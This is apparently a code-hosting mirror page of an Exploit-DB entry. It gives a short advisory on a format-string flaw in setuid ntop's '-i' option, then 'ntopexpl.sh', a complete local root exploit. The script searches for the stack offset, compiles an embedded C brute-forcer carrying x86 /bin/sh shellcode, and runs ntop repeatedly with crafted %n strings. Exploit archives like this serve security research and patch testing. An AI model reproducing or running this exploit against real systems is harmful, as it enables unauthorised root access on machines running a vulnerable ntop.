bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/unix/local/20326.sh
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

235 lines
No EOL
5.1 KiB
Bash
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/1840/info
ntop (network top) is a unix program used for displaying network usage statistics. It is often installed setuid root because it uses privileged ports.
ntop is vulnerable to a format string vulnerability that can compromise root access locally. If present, the argument to the "-i" command-line option is passed directly to a *printf function without being checked. It is thus possible for an attacker insert format specifiers that will be interpreted by the *printf function. Malicious format specifiers can cause the function to overwrite memory locations on the program's stack with user supplied data. This can lead to execution of arbitrary code with the effective privileges of the process (if setuid root, superuser privs).
########################## ntopexpl.sh ##########################
#!/bin/bash
# CONFIGURATION:
umask 000
target="/usr/sbin/ntop"
tmpdir="/tmp/"
# address we want to write to (ret on the stack)
# has to be an absolute address but we brute force
# this scanning 64 addresses from writeadr on
writeadr="0xbffff000"
# no. of addresses to scan
wrep=64
# address of the shell in our string
# must point somewhere to our 'nop' region
shadr="0xbffff320"
# number of nops before shellcode
declare -i nnops
nnops=128
echo
echo "-------------------------------------------"
echo "| ntop local r00t exploit |"
echo "| by IhaQueR |"
echo "| only for demonstrative purposes |"
echo "-------------------------------------------"
echo
echo
echo "configured for running $target"
echo "RETADR = $writeadr"
echo "SHELL = $shadr"
echo "NOPS = $nnops"
echo
# fake shellcode
shellfake="SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
# number of nops before shellcode
declare -i nnops
nnops=128
# make nop field
declare -i idx
idx=0
nfake=""
while test $idx -lt $nnops; do
nfake="N$nfake"
idx=$(($idx+1))
done;
# sanity check :-)
if ! test -x $target ; then
echo "[-] $target not found or not executable, sorry"
exit 1
fi;
echo "[+] found $target"
declare -i cnt
declare -i cntmax
cnt=0
cntmax=1024
# make string used for offset search
# like <head><addr><nops><shellcode>
# PP stands for padding
string="%0016d%x%0016d%d%0016d%d%0016d%dABCDEEEEFFFFGGGGHHHHIIIIJJJJKKKK${nfake}${shellfake}"
padding="PP"
declare -i npad
npad=2
gstring=""
# find offset
echo " now searching for offset"
echo
while test $cnt -le $cntmax ; do
gstring="%16g$gstring"
string="%16g$string"
cnt=$(($cnt+1))
result=$($target -i "$padding$string" 2>&1 | grep "44434241")
echo -n "[$cnt] "
if test "$result" != "" ; then
break;
fi;
done
# found offset
declare -i offset
offset=$(($cnt * 4))
echo
echo
if test $cnt -gt $cntmax ; then
echo "[-] offset not found, please tune padding :-)"
exit 2
fi;
echo "[+] OFFSET found to be $offset/$cnt"
echo " now constructing magic string"
# number of bytes written so far
declare -i nwrt
nwrt=$((16*${cnt} + ${npad}))
# bruteforce
echo "[+] string fileds prepared"
echo
cat <<__BRUTE__ >brute.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
// used with <string> <numwritten> <nops>
main(int argc, char** argv)
{
unsigned char str[8192];
unsigned char buf[8192];
unsigned char nop[1024];
unsigned addr[9];
unsigned char head[33]="%0016d%x%0016d%x%0016d%x%0016d%x";
// standard /bin/sh shell :-)
unsigned char hellcode[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
int i, flip, nbrute;
unsigned char* ptr;
unsigned shadr, rtadr, nwrt;
int dn;
// construct string like <pad><eatstack><head><addr><nops><shell>
// no. of attempts
nbrute = $wrep;
// addr
rtadr = $writeadr;
while(nbrute>0) {
printf("[%4d] ", nbrute);
fflush(stdout);
fflush(stderr);
// nops
for(i=0; i<atol(argv[3]); i++)
nop[i] = 0x90;
nop[i] = 0;
// head
shadr = $shadr;
// 6 comes from "bind: "
nwrt = atol(argv[2]) + 6;
ptr = (unsigned char*)&shadr;
for(i=0; i<4; i++) {
flip = (((int)256) + ((int)ptr[i])) - ((int)(nwrt % 256));
nwrt = nwrt + flip;
sprintf(head+i*8, "%%%04dx%%n", flip);
}
head[32] = 0;
// address field
for(i=0; i<4; i++) {
addr[2*i] = rtadr + i;
addr[2*i+1] = rtadr + i;
}
addr[8] = 0;
sprintf(str, "%s%s%s%s%s", argv[1], head, addr, nop, hellcode);
sprintf(buf, "./ntop -i \"%s\"", str);
// kabuum
system(buf);
nbrute--;
rtadr += 4;
}
return 0;
}
__BRUTE__
rm -rf brute
gcc brute.c -o brute
if ! test -x brute ; then
echo "[-] compilation error, exiting"
exit 2
fi;
echo "[+] bruteforce prog prepared"
echo " now brute force"
echo
brute "$padding$gstring" ${nwrt} ${nnops}
echo ""
echo "[+] done"
echo ""
Reference in a new issue View git blame Copy permalink